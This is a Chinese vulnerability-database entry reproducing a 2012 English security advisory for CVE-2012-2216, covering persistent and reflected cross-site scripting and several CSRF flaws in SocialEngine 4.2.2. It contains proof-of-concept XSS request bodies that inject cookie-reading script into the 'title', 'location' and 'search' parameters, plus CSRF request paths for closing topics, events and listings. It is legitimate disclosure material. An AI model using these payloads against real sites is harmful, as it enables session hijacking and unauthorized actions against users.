SocialEngine 多个输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121166 漏洞类型 输入验证
发布时间 2012-05-25 更新时间 2012-05-25
CVE编号 CVE-2012-2216 CNNVD-ID CNNVD-201205-461
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/18927
https://www.securityfocus.com/bid/53680
https://cxsecurity.com/issue/WLB-2012050186
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201205-461
|漏洞详情
SocialEngine是基于PHP的社会网络平台,允许在网站上创建社会网络。SocialEngine中存在多个漏洞,恶意用户可利用这些漏洞进行脚本嵌入攻击,或进行跨站脚本攻击和请求伪造攻击。1)借助传送至widget/index/content_id的“search”参数的输入,在被返回给用户前未进行正确的过滤。可利用该漏洞在受影响站点上下文的用户浏览器会话中,执行任意HTML和脚本代码攻击。2)借助传送至music/create的“title”参数的输入或events/create的“location”参数的输入,在被使用前未进行正确的过滤。当浏览恶意数据时,可在受影响站点上下文的用户浏览器会话中嵌入任意HTML和脚本代码。3)这个应用程序允许用户借助未执行任何有效性检查的HTTP请求去核实,执行任意操纵。例如,可利用该漏洞通过欺骗一个已登入管理员用户访问恶意网站来分配用户管理权限。这些漏洞存在于4.2.2版本,其他版本也可能受到影响。
|漏洞EXP
Social Engine 4.2.2 Multiples Vulnerabilities
Earlier versions are also possibly vulnerable.

INFORMATION

Product: Social Engine 4.2.2
Remote-Exploit: yes
Vendor-URL: http://www.socialengine.net/
Discovered by: Tiago Natel de Moura aka "i4k"
Discovered at: 10/04/2012
CVE Notified: 10/04/2012
CVE Number: CVE-2012-2216

OVERVIEW

Social Engine versions 4.2.2 is vulnerable to XSS and CSRF.

INTRODUCTION

SocialEngine is a PHP-based white-label social networking service
platform, that provides features similar to a social network on a user's
website. Main features include administration of small-to-mid scale
social networks, some customization abilities, unencrypted code,
multilingual capability, and modular plugin/widget compatibility. There
is a range of templates and add-ons available to extend the basic
features already included in the SocialEngine core.

VULNERABILITY DESCRIPTION

== Persistent XSS in music upload. ==

CWE-79: http://cwe.mitre.org/data/definitions/79.html
The software does not neutralize or incorrectly neutralizes
user-controllable input before it is placed in output that is
used as a web page that is served to other users.

Proof Of Concept:
POST http://localhost/index.php/music/create

POST data without form-data enctype:
title=<script>alert(document.cookie);</script>&description=teste
&search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename=
&fancyuploadfileids=15

== Persistent XSS in creating events ==

POST
http://localhost/socialengine/socialengine422_trial/index.php/events/create

POST data without form-data enctype:
title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012&
starttime[hour]=1&starttime[minute]=0&starttime[ampm]=AM&endtime[date]=4/12/2012
&endtime[hour]=1&endtime[minute]=0&endtime[ampm]=AM&host=teste
&location=<script>alert(document.cookie);</script>&MAX_FILE_SIZE=8388608&
photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1&
auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit=

== Reflected XSS in search form of events area. ==

Direct javascript injected:
POST http://localhost/index.php/widget/index/content_id/644

format=html&subject=event_1&search=';alert(document.cookie);var a = '

Proof of Concept:
- - Go to URL: /index.php/event/$EVENT_ID
- - Click on the "Guests"
- - Click in "Search guests" form
- - Submit: ';alert(document.cookie); var a = '

You will see your PHPSESSID in the alert.

== Multiples CSRF vulnerabilities ==

CWE-352: http://cwe.mitre.org/data/definitions/352.html
The web application does not, or can not, sufficiently verify whether
a well-formed, valid, consistent request was intentionally provided by
the user who submitted the request.

A CSRF in the plugin "Forum" allows forcing the owner of the event to do
some
activities such as:

Close a topic:
GET /index.php/forums/topic/4/example-topic/close/close/1

Open a topic:
GET /index.php/forums/topic/4/example-topic/close/close/0

A CSRF in the plugin "Event" allows forcing the owner of the event to do
some
activities such as:

Close the event:
GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2

Open the event:
GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2

"Watch Topic":
GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2

"Stop Watching Topic":
GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2

A CSRF in the plugin "Classifieds" allows forcing the owner of the event
to do
some activities such as:

Open the classified listing:
GET /index.php/classifieds/close/1/closed/0

Close the classified listing:
GET /index.php/classifieds/close/1/closed/1

VERSIONS AFFECTED

Tested with version 4.2.2 but earlier versions are possibly vulnerable.

SOLUTION

Upgrade to Social Engine 4.2.4.

NOTES


The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2012-2216 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.
CREDITS

Tiago Natel de Moura aka "i4k"
SEC+ Information Security Company - http://www.secplus.com.br/
BugSec Security Team - http://bugsec.googlecode.com/

-- 
Tiago Natel de Moura
IT Security Consultant                       
http://www.linkedin.com/in/tiagonatel
http://www.secplus.com.br/
http://github.com/tiago4orion
http://code.google.com/p/bugsec
|受影响的产品
Social Engine Social Engine 4.2.2
|参考资料

来源:seclists.org
链接:http://seclists.org/oss-sec/2012/q2/396
来源:SECUNIA
名称:49255
链接:http://secunia.com/advisories/49255